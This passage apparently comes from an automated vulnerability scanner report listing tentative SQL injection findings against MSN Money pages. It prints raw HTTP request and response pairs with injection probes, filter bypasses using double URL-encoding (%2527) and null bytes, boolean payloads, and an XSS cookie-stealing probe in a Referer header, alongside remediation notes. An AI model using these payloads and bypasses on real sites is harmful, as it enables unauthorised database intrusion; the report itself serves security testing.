NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1180
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

1.20. http://redacted/ [CC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:13:01 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:13:01 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//
Content-Length: 54

object moved <a href="http://money.msn.com//">here</a>

1.21. http://redacted/ [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:02:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

1.22. http://redacted/detail/stock_quote [ATC_ID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The ATC_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ATC_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ATC_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.23. http://redacted/detail/stock_quote [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:12 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.24. http://redacted/detail/stock_quote [Sample cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 02:13:55 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:13:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.25. http://redacted/detail/stock_quote [expid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the expid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?Symbol=$INDU HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:19 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?Symbol=$INDU HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527%2527;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price?symbol=%24INDU
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 186

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price?symbol=%24INDU">here</a>.</h2>
</body></html>

1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:24 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900;border:#CC9900;color:White;font-weight:bold;font-size:11pt;font-family:Arial,Helvetica;}
.normalcolor {color:#CC9900; font-size:10pt;font-family: Arial,Helvetica;}
.HRCatColor {color:#CC9900;}

.HeaderCategory{color:#CC9900;font-size:22px;}--></STYLE>

<HTML><HEAD><TITLE>MSN Money</TITLE>
<META HTTP-EQUIV="Expires" CONTENT="Fri, 01 Jan 1999 12:00:00 GMT">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="cache-control" CONTENT="private">
<SCRIPT TYPE="text/javascript">
   function body_load()
   {
       var re = /^.*GUID=([a-f|\d]{32}).*$/i;
       var matches = re.exec( document.cookie );
       if( matches == null )
           return;

       var host = document.location.hostname;
       var domain = null;
       
       if( host.indexOf('.redacted') != -1 )
       {
           domain = 'redacted';
       }
       if( domain == null )
       {
           return;
       }

       var guid = matches[1].toLowerCase();
       if( guid == '25c836ef9256475d91344c42b54a03f9' || guid == '0f868cfe997d4557b8112a3dfaa2a8e4' )
       {
           document.domain = domain;
           document.cookie = 'MC1=;expires=Fri, 31 Dec 1999; 00:00:00 GMT; domain=' + domain;
           if( document.referrer == null || document.referrer == '' )
           {
               document.location.href = 'http://moneycentral.msn.com';
           }
           else
           {
               document.location.href = document.referrer;
           }
       }
   }
</SCRIPT>

</HEAD>
<BODY TOPMARGIN=0 LEFTMARGIN=0 MARGINHEIGHT=0 MARGINWIDTH=0 BGCOLOR=WHITE TEXT=#333333 LINK=#07519A ALINK=#07519A VLI
...[SNIP]...

1.27. http://redacted/inc/Attributions.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:16:18 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

1.28. http://redacted/inc/Views/Shared/Core/Content/js/async/jasync.js [userCh cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/async/jasync.js

Issue detail

The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:57:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/async/jasync.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:57:13 GMT
Content-Length: 2177


(function($)
{var defaults={timeout:50};var pending={};var pollList=[];var waitList=[];var timerId;var $isString=$.isString;var $isFunction=$.isFunction;var w=window;function async(test,action,url)
...[SNIP]...

1.29. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js

Issue detail

